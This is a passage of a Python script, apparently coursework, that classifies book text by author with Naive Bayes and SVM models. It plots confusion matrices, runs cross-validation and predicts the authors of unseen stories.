confusion_matrix(ybook_test, bookSVMPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_Linear.score(Xbook_train, ybook_train)\nbookSVM_Linear.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, 
average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict))\n\n#-------------------------------------------------------------------------\n# with TFIDF\nbookSVM_LinearTF = SVM_Model.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF = SVM_Model.predict(Xbook_test_TF)\n\nSVM_matrixTF = confusion_matrix(ybook_test_TF, bookSVMPredictTF)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrixTF)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_LinearTF.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_LinearTF.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF))\n\n#------------------------------------ SVM with rbf kernel ----------------------------------------\n# ran with Cost = 1 - all classified as one label\n# ran again with Cost = 50, much better\nSVM_Model_rbf=svm.SVC(C=100, kernel='rbf', \n verbose=True, gamma=\"auto\")\n# with Countvectorizer\nbookSVM_rbf = SVM_Model_rbf.fit(Xbook_train, ybook_train)\nbookSVMPredict_rbf = SVM_Model_rbf.predict(Xbook_test)\n\nSVM_matrix_rbf = confusion_matrix(ybook_test, bookSVMPredict_rbf)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix_rbf)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_rbf.score(Xbook_train, ybook_train)\nbookSVM_rbf.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict_rbf)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_rbf, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict_rbf))\n\n#-------------------------------- SVM with RBF Kernel TFIDF Vectorization -----------\n# with TFIDF\n\nbookSVM_TF_rbf = SVM_Model_rbf.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF_rbf = SVM_Model_rbf.predict(Xbook_test_TF)\n\nSVM_matrixTF_rbf = confusion_matrix(ybook_test_TF, bookSVMPredictTF_rbf)\nprint(\"\\nThe confusion 
matrix is:\")\nprint(SVM_matrixTF_rbf)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_TF_rbf.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_TF_rbf.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF_rbf)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_rbf, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF_rbf))\n\n#------------------------------------ SVM with poly kernel ----------------------------------------\nSVM_Model_poly=svm.SVC(C=100, kernel='poly', degree=2,\n verbose=True, gamma=\"auto\")\n\n# with Countvectorizer\nbookSVM_poly = SVM_Model_poly.fit(Xbook_train, ybook_train)\nbookSVMPredict_poly = SVM_Model_poly.predict(Xbook_test)\n\nSVM_matrix_poly = confusion_matrix(ybook_test, bookSVMPredict_poly)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrix_poly)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_poly.score(Xbook_train, ybook_train)\nbookSVM_poly.score(Xbook_test, ybook_test)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test, bookSVMPredict_poly)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test, bookSVMPredict_poly, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test, bookSVMPredict_poly))\n\n#----------------------------------------------\n# with TFIDF\nbookSVM_TF_poly = SVM_Model_poly.fit(Xbook_train_TF, ybook_train_TF)\nbookSVMPredictTF_poly = SVM_Model_poly.predict(Xbook_test_TF)\n\nSVM_matrixTF_poly = confusion_matrix(ybook_test_TF, bookSVMPredictTF_poly)\nprint(\"\\nThe confusion matrix is:\")\nprint(SVM_matrixTF_poly)\nprint(\"\\n\\n\")\n\n# scores\nbookSVM_TF_poly.score(Xbook_train_TF, ybook_train_TF)\nbookSVM_TF_poly.score(Xbook_test_TF, ybook_test_TF)\n\n# Accuracy - test set\nAS = accuracy_score(ybook_test_TF, bookSVMPredictTF_poly)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='micro')\nprint(\"F1 
Micro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(ybook_test_TF, bookSVMPredictTF_poly, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(ybook_test_TF, bookSVMPredictTF_poly))\n\n#------------------------------- Confusion Matrix Pretty Plotter -----------------------\n# use some code (used this in our project too)\n# to define a function to draw a pretty confusion matrix\n# found this at https://scikit-learn.org/0.23/auto_examples/model_selection/plot_confusion_matrix.html\nimport itertools\ndef my_plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=0)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True Author')\n plt.xlabel('Predicted Author')\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Multinomial NB with CountVectorizer\n# Plot non-normalized confusion matrix\nlbls = ['Blackwood', 'James', 'Poe', 'Stoker']\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB with TFIDF Vectorizer\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelTF_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with TFIDF Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelTF_CM, classes=lbls, normalize = True,\n title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with TFIDF Vectorizer',\n cmap=plt.cm.Reds)\nplt.show()\n\n# Bernoulli NB with CountVectorizer\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelB_CM, classes=lbls, normalize = False,\n title='Book Labeled by Author Confusion Matrix - Bernoulli Naive Bayes\\nVectorization with Binary Count 
Vectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabelB_CM, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Normalized Confusion Matrix - Bernoulli Naive Bayes\\nVectorization with Binary Count Vectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB - Unigrams and Bigrams\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_ub, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer\\nUnigrams and Bigrams',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_ub, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Count Vectorizer\\nUnigrams and Bigrams',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Multinomial NB - Bigrams and Trigrams \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_bt, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Binary Count Vectorizer\\nBigrams and Trigrams',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(bookLabel_CM_bt, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Normalized Confusion Matrix - Multinomial Naive Bayes\\nVectorization with Binary Count Vectorizer\\nBigrams and Trigrams',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Linear Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with CountVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with CountVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Linear Kernel with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with TFIDFVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Linear Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# SVM RBF Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n
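# note: in my_plot_confusion_matrix above, normalize=True divides each row of\n# cm by its row sum, so the annotated cells read as per-true-author recall\n# rather than raw counts\n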
# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_rbf, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with CountVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_rbf, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with CountVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# SVM RBF with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_rbf, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with TFIDFVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_rbf, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with RBF Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# SVM Polynomial Kernel with CountVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_poly, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with CountVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrix_poly, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with CountVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n\n# SVM Polynomial Kernel with TFIDFVectorizer Vectorization \n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_poly, classes=lbls, normalize = False,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with TFIDFVectorizer',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n# Plot normalized confusion matrix\nplt.figure(figsize=(6,4))\nmy_plot_confusion_matrix(SVM_matrixTF_poly, classes=lbls, normalize = True,\n                         title='Book Labeled by Author Confusion Matrix - SVM with Polynomial Kernel\\nVectorization with TFIDFVectorizer (Normalized)',\n                         cmap=plt.cm.Reds)\nplt.show()\n\n#---------------------------------- Cross Validation --------------------------------------------\n# The function works for Bernoulli, MultinomialNB, SVM - Linear, Poly and RBF Kernels\n# it also supports the passing of a cost variable for SVM \n# items passed - then we can use this information to pass in test data from the predicted set\n###------------------------------- Function for doing Cross Validation ---------------------------\n# Author: These programs were provided to me in IST 664 Class by the Instructor\n# first define the function to run the cross validation given the docs, gold standard labels and \n# the featureset for testing\n# function passing number of folds, feature set and labels\n## 
cross-validation ##\n# calling cross_validation_accuracy(num_folds, restSentDF, 'sentiment')\ndef cross_validation_accuracy(num_folds, df_wlabels, lbl_col, \n                              modelName = 'MultiNB', cost_value=1):\n    subset_size = int(len(df_wlabels)/num_folds)\n    print('Each fold size:', subset_size)\n    accuracy_list = []\n    # iterate over the folds\n    for i in range(num_folds):\n        #print(\"Fold is \", i)\n        test_this_round = df_wlabels[(i*subset_size):][:subset_size]\n        #print (\"test round is \", test_this_round.head())\n        # build the training set\n        if i != 0:\n            firstHalf = df_wlabels[:(i*subset_size)]\n            secondHalf = df_wlabels[((i+1)*subset_size):]\n            train_this_round = firstHalf.append(secondHalf)\n        else:\n            train_this_round = df_wlabels[((i+1)*subset_size):]\n        #print (\"train round is \", train_this_round.head())\n        # build train with and without labels\n        X_train = train_this_round.loc[:, train_this_round.columns != lbl_col]\n        y_train = train_this_round[lbl_col]\n        #print(\"X_train head is \", X_train.head())\n        #print(\"y_train head is \", y_train.head())\n        # build test with and without labels\n        #X_test = train_this_round.loc[:, train_this_round.columns != lbl_col]\n        #y_test = train_this_round[lbl_col]\n        X_test = test_this_round.loc[:, test_this_round.columns != lbl_col]\n        y_test = test_this_round[lbl_col]\n        #print(\"X_test head is \", X_test.head())\n        #print(\"y_test head is \", y_test.head())\n        # train using train_this_round\n        # create classifier based on modelName\n        if modelName == 'MultiNB' or modelName == 'TFIDF':\n            # create the Naive Bayes Multinomial classifier (model)\n            myModel = MultinomialNB()\n        if modelName == 'Bernoulli':\n            myModel = BernoulliNB()\n        # cost value = 1 is good here\n        if modelName == 'Linear':\n            myModel = LinearSVC(C = cost_value)\n        # cost value = 100 is good here\n        if modelName == 'RBF':\n            myModel = svm.SVC(C = cost_value, kernel = 'rbf', \n                              verbose = True, gamma = \"auto\")\n        # cost value = 100 is good here\n        if modelName == 'Poly':\n            myModel = svm.SVC(C = cost_value, kernel = 'poly', \n                              degree = 2, verbose = True, \n                              gamma = \"auto\")\n        fitModel = myModel.fit(X_train, y_train)\n        predictModel = myModel.predict(X_test)\n        y_predict = predictModel\n        # evaluate against test_this_round and save accuracy\n        # Confusion Matrix\n        # call confusion matrix with TEST Labels, PREDICTED Labels\n        CM = confusion_matrix(y_test, y_predict)\n        # Accuracy\n        AS = accuracy_score(y_test, y_predict)\n        print(\"Fold: \", i , \"Accuracy Score: \", AS)\n        # Recall\n        RS = recall_score(y_test, y_predict, average=None)\n        # Precision\n        PS = precision_score(y_test, y_predict, average=None)\n\n        # Method 3: Classification report [BONUS]\n        #print(classification_report(y_test, y_predict))\n        # add accuracy to list\n        accuracy_list.append(AS)\n    # find mean accuracy over all rounds\n    print ('mean accuracy', sum(accuracy_list) / num_folds)\n\n
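# Illustrative sanity check of the fold slicing idiom above (toy data only;\n# 'f1' and 'label' are made-up names, not columns from our corpus):\n_toy = pd.DataFrame({'f1': range(10), 'label': [0, 1]*5})\n_sz = int(len(_toy)/5)\nfor _i in range(5):\n    assert len(_toy[(_i*_sz):][:_sz]) == _sz  # each of the 5 test slices has 2 rows\n\n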
# test this cross-validation function\n# need to do a random shuffle\n# might need them combined before shuffling, and then split out the sentiment column\n# set the number of folds for cross validation\nnum_folds = 10\n# CountVectorizer - with Multinomial NB (Book Author)\nprint(\"\\nMultinomial Naive Bayes with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'MultiNB')\n\n# TFIDFVectorizer - with Multinomial NB (Book Author)\nprint(\"\\nMultinomial Naive Bayes with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'TFIDF')\n\n# CountVectorizer - with Bernoulli NB (Book Author)\nprint(\"\\nBernoulli Naive Bayes with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Bernoulli')\n\n# CountVectorizer - with SVM - Linear Kernel (Book Author)\nprint(\"\\nSVM Linear Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 1\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Linear', 1)\n\n# TFIDFVectorizer - with SVM - Linear Kernel (Book Author)\nprint(\"\\nSVM Linear Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 1\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'Linear', 1)\n\n# CountVectorizer - with SVM RBF Kernel (Book Author)\nprint(\"\\nSVM RBF Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'RBF', 100)\n\n# TFIDFVectorizer - with SVM RBF Kernel (Book Author)\nprint(\"\\nSVM RBF Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'RBF', 100)\n\n# CountVectorizer - with SVM Poly Kernel (Book Author)\nprint(\"\\nSVM Polynomial Kernel with CountVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF = shuffle(bookLabelVectorDF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF, 'book_author', 'Poly', 100)\n\n# TFIDFVectorizer - with SVM Polynomial Kernel (Book Author)\nprint(\"\\nSVM Polynomial Kernel with TFIDFVectorizer Results (Book Labeled by Author):\")\ns_bookLabelVectorDF_TF = shuffle(bookLabelVectorDF_TF)\n# passing in Cost_value = 100\ncross_validation_accuracy(num_folds, s_bookLabelVectorDF_TF, 'book_author', 'Poly', 100)\n\n#-------------------------- Testing with Predict ----------------------------------\n### OK - time to run the *BEST* models on our predicted set\n# Best Models:\n# Multinomial NB using CountVectorizer vectorization\n# first just use one test using \n# predictVectorDF - is the DF that has the words and vectors as a dataframe (like Xbook_test)\n# PredictLabelArray - is the array of correct labels in an array (like ybook_test)\n\n# let's create just a test set of the authors from our set of four\nfour_predictLabelVectorDF = predictLabelVectorDF[predictLabelVectorDF['book_author'].isin(['poe','stoker', 'james', 'blackwood'])]\nfour_predictLabel = four_predictLabelVectorDF['book_author']\nfour_predictLabelArray = four_predictLabel.to_numpy()\nfour_predictDF = 
four_predictLabelVectorDF.drop(['book_author'], axis=1)\n#------------------------------------------Multinomial Naive Bayes ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\nmyNB= MultinomialNB()\nbookNB = myNB.fit(Xbook_train, ybook_train)\n# this doesn't work....\npredictPredict = myNB.predict(four_predictDF)\nprint(np.round(myNB.predict_proba(predictVectorDF),2))\n\n# call confusion matrix with TEST Labels, PREDICTED Labels\npredictLabel_CM = confusion_matrix(four_predictLabelArray, predictPredict)\nprint(\"\\nThe confusion matrix is:\")\nprint(predictLabel_CM)\n\n# Accuracy - test set\nAS = accuracy_score(four_predictLabelArray, predictPredict)\nprint(\"Accuracy is \", AS)\n# Recall\nRS = recall_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"Recall is \", RS)\n# Precision\nPS = precision_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"Precision Score is \", PS)\n\n# Method 1: sklearn\nF1 = f1_score(four_predictLabelArray, predictPredict, average=None)\nprint(\"F1 Score is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='micro')\nprint(\"F1 Micro Average is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='macro')\nprint(\"F1 Macro Average is \", F1)\nF1 = f1_score(four_predictLabelArray, predictPredict, average='weighted')\nprint(\"F1 Weighted Average is \", F1)\n\n# Method 3: Classification report [BONUS]\nprint(classification_report(four_predictLabelArray, predictPredict))\n\n#------------------------------------------------------------------\n# New function for confusion matrix\ndef my_plot_confusion_matrix_uneven(cm, xclasses, yclasses,\n normalize=False,\n title='Confusion Matrix',\n cmap=plt.cm.viridis_r):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n np.set_printoptions(precision=3)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n #plt.colorbar()\n xtick_marks = np.arange(len(xclasses))\n ytick_marks = np.arange(len(yclasses))\n plt.xticks(xtick_marks, xclasses, rotation=0)\n plt.yticks(ytick_marks, yclasses)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], '.3f'),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True Author')\n plt.xlabel('Predicted Author')\n\n#----------------------------------------- Now do for entire set ----------------------------------------\n# Multinomial Naive Bayes with CountVectorizer Vectorization ------------------------------\n# the classifiers\n# create the Naive Bayes Multinomial classifier (model)\n# This is the instance of the model - it does not change\nmyNB= MultinomialNB()\nbookNB = myNB.fit(Xbook_train, ybook_train)\n# this doesn't work....\nstoryPredict = myNB.predict(predictVectorDF)\nmyNB.predict_proba(predictVectorDF)\nstory_CM = np.round(myNB.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplbls = predictLabelArray.tolist()\nplt.figure(figsize=(20,20))\n# Plot normalized confusion 
matrix\nmy_plot_confusion_matrix_uneven(story_CM, xclasses=lbls, yclasses=plbls, normalize = True,\n                          title='Predicted Author (unseen) Confusion Matrix - MultinomialNB\\nVectorization with CountVectorizer (Normalized)',\n                          cmap=plt.cm.Reds)\nplt.show()\n\n# Bernoulli NB CountVectorizer vectorization ------------------------\nmyB = BernoulliNB()\nbookB = myB.fit(Xbook_train, ybook_train)\nstoryPredictB = myB.predict(predictVectorDF)\n\nmyB.predict_proba(predictVectorDF)\nstory_CMB = np.round(myB.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\nplbls = predictLabelArray.tolist()\nplt.figure(figsize=(20,20))\n# Plot normalized confusion matrix\nmy_plot_confusion_matrix_uneven(story_CMB, xclasses=lbls, yclasses=plbls, normalize = True,\n                          title='Predicted Author (unseen) Confusion Matrix - BernoulliNB\\nVectorization with CountVectorizer (Normalized)',\n                          cmap=plt.cm.Reds)\nplt.show()\n\n## 3/12 - ** WORKS TO HERE **\n# 